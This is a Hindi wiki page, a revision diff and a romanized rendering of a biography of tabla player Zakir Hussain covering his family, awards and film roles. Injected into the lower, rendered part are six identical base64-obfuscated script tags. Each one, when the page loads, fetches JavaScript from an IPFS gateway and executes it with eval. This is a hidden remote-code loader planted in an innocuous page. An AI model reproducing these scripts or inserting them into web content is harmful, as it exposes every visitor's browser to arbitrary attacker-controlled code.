Difference between revisions of "उस्ताद ज़ाकिर हुसैन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by the same user not shown)
Line 11: Line 11:
 
|मृत्यु स्थान=
 
|मृत्यु स्थान=
 
|अभिभावक=[[अल्ला रक्खा ख़ाँ|उस्ताद अल्ला रक्खा ख़ाँ]]
 
|अभिभावक=[[अल्ला रक्खा ख़ाँ|उस्ताद अल्ला रक्खा ख़ाँ]]
|पति/पत्नी=
+
|पति/पत्नी=एंटोनिया मिनीकोला
|संतान=
+
|संतान=अनीसा कुरैशी और इसाबेला कुरैशी
 
|कर्म भूमि=[[भारत]]
 
|कर्म भूमि=[[भारत]]
 
|कर्म-क्षेत्र=तबला वादन
 
|कर्म-क्षेत्र=तबला वादन
 
|मुख्य रचनाएँ=
 
|मुख्य रचनाएँ=
|मुख्य फ़िल्में=
+
|मुख्य फ़िल्में=हीट एंड डस्ट, द परफेक्ट मर्डर, मिस बैटीज चिल्डर्स, साज।
 
|विषय=
 
|विषय=
 
|शिक्षा=
 
|शिक्षा=
 
|विद्यालय=
 
|विद्यालय=
|पुरस्कार-उपाधि= [[पद्म श्री]], [[पद्म भूषण]], ग्रैमी पुरस्कार (दो बार)
+
|पुरस्कार-उपाधि= [[पद्म श्री]], [[1988]]<br/>
|प्रसिद्धि=
+
[[पद्म भूषण]], [[2002]]<br/>
 +
[[पद्म विभूषण]], [[2023]]<br/>
 +
ग्रैमी पुरस्कार (दो बार)
 +
|प्रसिद्धि=तबलावादक
 
|विशेष योगदान=
 
|विशेष योगदान=
 
|नागरिकता=भारतीय
 
|नागरिकता=भारतीय
Line 29: Line 32:
 
|शीर्षक 2=
 
|शीर्षक 2=
 
|पाठ 2=
 
|पाठ 2=
|अन्य जानकारी=
+
|अन्य जानकारी=ज़ाकिर हुसैन पहले भारतीय हैं, जिन्हें ऑल-स्टार ग्लोबल कॉन्सर्ट में भाग लेने के लिए पूर्व अमेरिकी राष्ट्रपति [[बराक ओबामा]] की ओर से व्हाइट हाउस में आमंत्रित किया गया।
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
|अद्यतन=
+
|अद्यतन={{अद्यतन|10:32, 7 जुलाई 2023 (IST)}}
 
}}
 
}}
'''ज़ाकिर हुसैन''' ([[अंग्रेज़ी]]: ''Zakir Hussain'', जन्म: [[9 मार्च]], [[1951]]) [[भारत]] के प्रसिद्ध [[तबला वादक]] हैं। वे मशहूर तबला वादक [[अल्ला रक्खा ख़ाँ|क़ुरैशी अल्ला रक्खा ख़ान]] के पुत्र हैं। अल्ला रक्खा ख़ान भी [[तबला]] बजाने में माहिर माने जाते थे।  
+
'''ज़ाकिर हुसैन''' ([[अंग्रेज़ी]]: ''Zakir Hussain'', जन्म: [[9 मार्च]], [[1951]]) [[भारत]] के प्रसिद्ध [[तबला वादक]] हैं। वे मशहूर तबला वादक [[अल्ला रक्खा ख़ाँ|क़ुरैशी अल्ला रक्खा ख़ान]] के पुत्र हैं। अल्ला रक्खा ख़ान भी [[तबला]] बजाने में माहिर माने जाते थे। ज़ाकिर हुसैन जब अपनी उंगलियों और हाथ की थाप से तबला बजाते हैं तो संसार को मंत्रमुग्ध कर देते हैं। उनके तबले के सुर को सुन लोग मदहोश हो जाते हैं और कहते हैं 'वाह उस्ताद'। ज़ाकिर हुसैन ने देश ही नहीं, बल्कि दुनिया भर में अपनी कला का परचम लहराया है। जीवन में इतनी प्रसिद्धि पाने के बाद भी उस्ताद को सादगी से रहना पसंद है और वह अक्सर जमीन से जुड़े रहते हैं। उन्होंने अपने जीवन में कई संघर्षों के बाद यह मुकाम पाया है। [[भारत सरकार]] द्वारा उन्हें [[पद्म विभूषण]], [[पद्म भूषण]] तथा [[पद्म श्री]] से सम्मानित किया जा चुका है।
==जीवन परिचय==
+
==परिचय==
ज़ाकिर हुसैन का बचपन [[मुंबई]] में ही बीता। 12 साल की उम्र से ही ज़ाकिर हुसैन ने [[संगीत]] की दुनिया में अपने तबले की आवाज़ को बिखेरना शुरू कर दिया था। प्रारंभिक शिक्षा और कॉलेज के बाद ज़ाकिर हुसैन ने [[कला]] के क्षेत्र में अपने आप को स्थापित करना शुरू कर दिया। [[1973]] में उनका पहला एलबम '''लिविंग इन द मैटेरियल वर्ल्ड''' आया था। उसके बाद तो जैसे ज़ाकिर हुसैन ने ठान लिया कि अपने तबले की आवाज़ को दुनिया भर में बिखेरेंगे। 1973 से लेकर [[2007]] तक ज़ाकिर हुसैन विभिन्न अंतरराष्ट्रीय समारोहों और एलबमों में अपने तबले का दम दिखाते रहे। ज़ाकिर हुसैन भारत में तो बहुत ही प्रसिद्ध हैं ही साथ ही विश्व के विभिन्न हिस्सों में भी समान रुप से लोकप्रिय हैं।
+
ज़ाकिर हुसैन का बचपन [[मुंबई]] में ही बीता। 12 साल की उम्र से ही ज़ाकिर हुसैन ने [[संगीत]] की दुनिया में अपने तबले की आवाज़ को बिखेरना शुरू कर दिया था। प्रारंभिक शिक्षा और कॉलेज के बाद ज़ाकिर हुसैन ने [[कला]] के क्षेत्र में अपने आप को स्थापित करना शुरू कर दिया। [[1973]] में उनका पहला एलबम 'लिविंग इन द मैटेरियल वर्ल्ड' आया था। उसके बाद तो जैसे ज़ाकिर हुसैन ने ठान लिया कि अपने तबले की आवाज़ को दुनिया भर में बिखेरेंगे। 1973 से लेकर [[2007]] तक ज़ाकिर हुसैन विभिन्न अंतरराष्ट्रीय समारोहों और एलबमों में अपने तबले का दम दिखाते रहे। वह भारत में तो बहुत ही प्रसिद्ध हैं ही, साथ ही विश्व के विभिन्न हिस्सों में भी समान रूप से लोकप्रिय हैं।
 +
 
 +
ज़ाकिर हुसैन अक्सर कहा करते हैं कि [[भारतीय शास्त्रीय संगीत]] स्टेडियम के लिए नहीं है, बल्कि यह कमरे का संगीत है। शायद ऐसा कोई ही देश बचा हो, जहां ज़ाकिर हुसैन ने अपना शो नहीं किया और जनता को अपनी कला का दीवाना ना बनाया हो।
 +
==विवाह==
 +
वर्ष [[1978]] में ज़ाकिर हुसैन ने [[कथक]] नृत्यांगना एंटोनिया मिनीकोला से शादी की। वह इटैलियन थीं और उनकी मैनेजर भी। उनकी दो बेटियां हैं- अनीसा कुरैशी और इसाबेला कुरैशी। ज़ाकिर हुसैन बिल लाउसवैस के ग्लोबल म्यूजिक सुपरग्रुप 'तबला बीट साइंस' के संस्थापक सदस्य भी हैं।<ref name="pp">{{cite web |url= https://www.amarujala.com/photo-gallery/entertainment/bollywood/zakir-hussain-birthday-world-say-wah-ustad-after-hearing-the-tune-of-zakir-hussain-tabla?pageId=5|title=ज़ाकिर हुसैन के तबले की धुन पर दुनिया कहती है 'वाह उस्ताद', पिता से विरासत में मिला था ये हुनर|accessmonthday=07 जुलाई|accessyear=2023 |last= |first= |authorlink= |format= |publisher=amarujala.com |language=हिंदी}}</ref>
 
==सम्मान और पुरस्कार==
 
==सम्मान और पुरस्कार==
 
*[[1988]] में जब उन्हें [[पद्म श्री]] का पुरस्कार मिला था तब वह महज 37 वर्ष के थे और इस उम्र में यह पुरस्कार पाने वाले सबसे कम उम्र के व्यक्ति भी थे।  
 
*[[1988]] में जब उन्हें [[पद्म श्री]] का पुरस्कार मिला था तब वह महज 37 वर्ष के थे और इस उम्र में यह पुरस्कार पाने वाले सबसे कम उम्र के व्यक्ति भी थे।  
 
*इसी तरह [[2002]] में संगीत के क्षेत्र में उनके योगदान के लिए उन्हें [[पद्म भूषण]] का पुरस्कार दिया गया था।
 
*इसी तरह [[2002]] में संगीत के क्षेत्र में उनके योगदान के लिए उन्हें [[पद्म भूषण]] का पुरस्कार दिया गया था।
*ज़ाकिर हुसैन को [[1992]] और [[2009]] में संगीत का सबसे प्रतिष्ठित पुरस्कार ग्रैमी अवार्ड भी मिला है।
+
*वर्ष [[2023]] में उन्हें [[पद्म विभूषण]] से सम्मानित किया गया है।
 +
*वह पहले भारतीय हैं, जिन्हें ऑल-स्टार ग्लोबल कॉन्सर्ट में भाग लेने के लिए पूर्व अमेरिकी राष्ट्रपति [[बराक ओबामा]] की ओर से व्हाइट हाउस में आमंत्रित किया गया।
 +
*उन्हें कई पुरस्कारों से भी सम्मानित किया जा चुका है। वहीं, संगीत की दुनिया का सबसे बड़ा ग्रैमी अवॉर्ड उन्हें दो बार, साल [[1992]] में 'द प्लेनेट ड्रम' और [[2009]] में 'ग्लोबल ड्रम प्रोजेक्ट' के लिए मिल चुका है।
 +
==अभिनय==
 +
ज़ाकिर हुसैन को [[तबला]] बजाने में तो दिलचस्पी थी ही, उन्हें एक्टिंग का भी शौक था। [[1983]] में ज़ाकिर हुसैन ने फिल्म 'हीट एंड डस्ट' से एक्टिंग में डेब्यू किया। इसके बाद [[1988]] में 'द परफेक्ट मर्डर', [[1992]] में 'मिस बैटीज चिल्डर्स' और [[1998]] में 'साज' फिल्म में भी उन्होंने एक्टिंग में अपना हाथ आजमाया।<ref name="pp"/>
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
Line 45: Line 56:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{शास्त्रीय वादक कलाकार}}{{संगीत वाद्य}}
+
{{शास्त्रीय वादक कलाकार}}{{पद्म विभूषण}}{{पद्म भूषण}}{{पद्मश्री}}
[[Category:पद्म श्री]][[Category:वादन]][[Category:शास्त्रीय वादक कलाकार]][[Category:संगीत कोश]][[Category:कला_कोश]][[Category:प्रसिद्ध व्यक्तित्व]]
+
[[Category:वादन]][[Category:शास्त्रीय वादक कलाकार]][[Category:संगीत कोश]][[Category:कला_कोश]][[Category:प्रसिद्ध व्यक्तित्व]]
[[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:पद्म भूषण]][[Category:चरित कोश]][[Category:तबला वादक]]
+
[[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:जीवनी साहित्य]][[Category:पद्म श्री]][[Category:पद्म श्री (1988)]][[Category:पद्म भूषण]][[Category:पद्म भूषण (2002)]][[Category:पद्म विभूषण]][[Category:पद्म विभूषण (2023)]][[Category:चरित कोश]][[Category:तबला वादक]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Latest revision as of 05:38, 7 July 2023

chitr:Disamb2.jpg zakir husain ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- zakir husain (bahuvikalpi)
ustad zakir husain
poora nam ustad zakir husain
janm 9 march, 1951
janm bhoomi bambee (ab muanbee)
abhibhavak ustad alla rakkha khaan
pati/patni eantoniya minikola
santan anisa kuraishi aur isabela kuraishi
karm bhoomi bharat
karm-kshetr tabala vadan
mukhy filmean hit eand dast, d paraphekt mardar, mis baitij childars, saj.
puraskar-upadhi padm shri, 1988

padm bhooshan, 2002
padm vibhooshan, 2023
graimi puraskar (do bar)

prasiddhi tabalavadak
nagarikata bharatiy
any janakari zakir husain pahale bharatiy haian, jinhean aaul-star global k aaunsart mean bhag lene ke lie poorv ameriki rashtrapati barak obama ki or se vhait haus mean amantrit kiya gaya.
adyatan‎

zakir husain (aangrezi: Zakir Hussain, janm: 9 march, 1951) bharat ke prasiddh tabala vadak haian. ve mashahoor tabala vadak quraishi alla rakkha khan ke putr haian. alla rakkha khan bhi tabala bajane mean mahir mane jate the. zakir husain jab apani uangaliyoan aur hath ki thap se tabala bajate haian to sansar ko mantramugdh kar dete haian. unake tabale ke sur ko sun log madahosh ho jate haian aur kahate haian 'vah ustad'. zakir husain ne desh hi nahian, balki duniya bhar mean apani kala ka paracham laharaya hai. jivan mean itani prasiddhi pane ke bad bhi ustad ko sadagi se rahana pasand hai aur vah aksar jamin se ju de rahate haian. unhoanne apane jivan mean kee sangharshoan ke bad yah mukam paya hai. bharat sarakar dvara unhean padm vibhooshan, padm bhooshan tatha padm shri se sammanit kiya ja chuka hai.

parichay

zakir husain ka bachapan muanbee mean hi bita. 12 sal ki umr se hi zakir husain ne sangit ki duniya mean apane tabale ki avaz ko bikherana shuroo kar diya tha. praranbhik shiksha aur k aaulej ke bad zakir husain ne kala ke kshetr mean apane ap ko sthapit karana shuroo kar diya. 1973 mean unaka pahala elabam 'liviang in d maiteriyal varld' aya tha. usake bad to jaise zakir husain ne than liya ki apane tabale ki avaz ko duniya bhar mean bikhereange. 1973 se lekar 2007 tak zakir husain vibhinn aantararashtriy samarohoan aur elabamoan mean apane tabale ka dam dikhate rahe. vah bharat mean to bahut hi prasiddh haian hi, sath hi vishv ke vibhinn hissoan mean bhi saman roop se lokapriy haian.

zakir husain aksar kaha karate haian ki bharatiy shastriy sangit stediyam ke lie nahian hai, balki yah kamare ka sangit hai. shayad aisa koee hi desh bacha ho, jahaan zakir husain ne apana sho nahian kiya aur janata ko apani kala ka divana na banaya ho.

vivah

varsh 1978 mean zakir husain ne kathak nrityaangana eantoniya minikola se shadi ki. vah itailiyan thian aur unaki mainejar bhi. unaki do betiyaan haian- anisa kuraishi aur isabela kuraishi. zakir husain bil lausavais ke global myoojik suparagrup 'tabala bit saians' ke sansthapak sadasy bhi haian.[1]

samman aur puraskar

  • 1988 mean jab unhean padm shri ka puraskar mila tha tab vah mahaj 37 varsh ke the aur is umr mean yah puraskar pane vale sabase kam umr ke vyakti bhi the.
  • isi tarah 2002 mean sangit ke kshetr mean unake yogadan ke lie unhean padm bhooshan ka puraskar diya gaya tha.
  • varsh 2023 mean unhean padm vibhooshan se sammanit kiya gaya hai.
  • vah pahale bharatiy haian, jinhean aaul-star global k aaunsart mean bhag lene ke lie poorv ameriki rashtrapati barak obama ki or se vhait haus mean amantrit kiya gaya.
  • unhean kee puraskaroan se bhi sammanit kiya ja chuka hai. vahian, sangit ki duniya ka sabase b da graimi av aaurd unhean do bar, sal 1992 mean 'd plenet dram' aur 2009 mean 'global dram projekt' ke lie mil chuka hai.

abhinay

zakir husain ko tabala bajane mean to dilachaspi thi hi, unhean ektiang ka bhi shauk tha. 1983 mean zakir husain ne philm 'hit eand dast' se ektiang mean debyoo kiya. isake bad 1988 mean 'd paraphekt mardar', 1992 mean 'mis baitij childars' aur 1998 mean 'saj' philm mean bhi unhoanne ektiang mean apana hath ajamaya.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>